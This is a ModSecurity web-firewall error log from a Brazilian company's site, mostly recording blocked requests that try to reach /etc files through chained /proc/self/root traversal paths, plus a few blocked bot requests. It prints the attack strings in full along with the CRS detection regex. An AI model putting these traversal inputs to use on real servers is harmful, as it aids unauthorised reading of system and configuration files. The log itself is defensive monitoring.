[Fri Mar 20 08:06:39.972346 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:41070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qP11pVZ5mVmJwsFMykQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:06:47.175253 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:47152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qR7ninkcc-iUj5ApgJAAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:07:34.428718 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:47166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qdl1pVZ5mVmJwsFMyzwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:08:22.894647 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:36604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qpvHIg5MgXLBnicP5RgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:08:25.532334 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.228.61:40946] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0qqTJ3M9BSuKP7CAYdaAAAAJY"]
[Fri Mar 20 08:08:33.288315 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:33540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qsQF0L0L-SsrnPo5q1QAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:08:35.797354 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:49878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qszJ3M9BSuKP7CAYdbwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:08:50.020116 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:49890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qwjJ3M9BSuKP7CAYdhgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:09:17.715465 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:40606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0q3fqxLDW4GITHUkTpXwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:09:19.067472 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:36318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0q3xCii7xarUs8iHZplwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:09:23.932245 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:47722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0q4_XLqtnMIWvjpaKcjwAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:09:26.266839 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:47730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0q5vHIg5MgXLBnicP5ZgAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:09:46.700573 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.244.43:43898] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0q-l1pVZ5mVmJwsFMzBgAAAEs"]
[Fri Mar 20 08:10:20.857433 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.243.128:47734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rHPqxLDW4GITHUkTpnQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:10:27.431829 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:41312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rI11pVZ5mVmJwsFMzHQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:10:35.373113 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:41328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rK_XLqtnMIWvjpaKctgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:10:47.715790 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:51012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rN9a6ubjKNq_cu4bXCAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:11:28.763134 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:44740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rYNa6ubjKNq_cu4bXNgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:11:31.540696 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:39124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rYzJ3M9BSuKP7CAYd6QAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:35.154509 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:59952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rZ_XLqtnMIWvjpaKc4QAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:36.463176 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:59954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0raAF0L0L-SsrnPo5rbQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:40.922459 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:45496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rbDJ3M9BSuKP7CAYd9gAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:11:42.215031 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:45506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 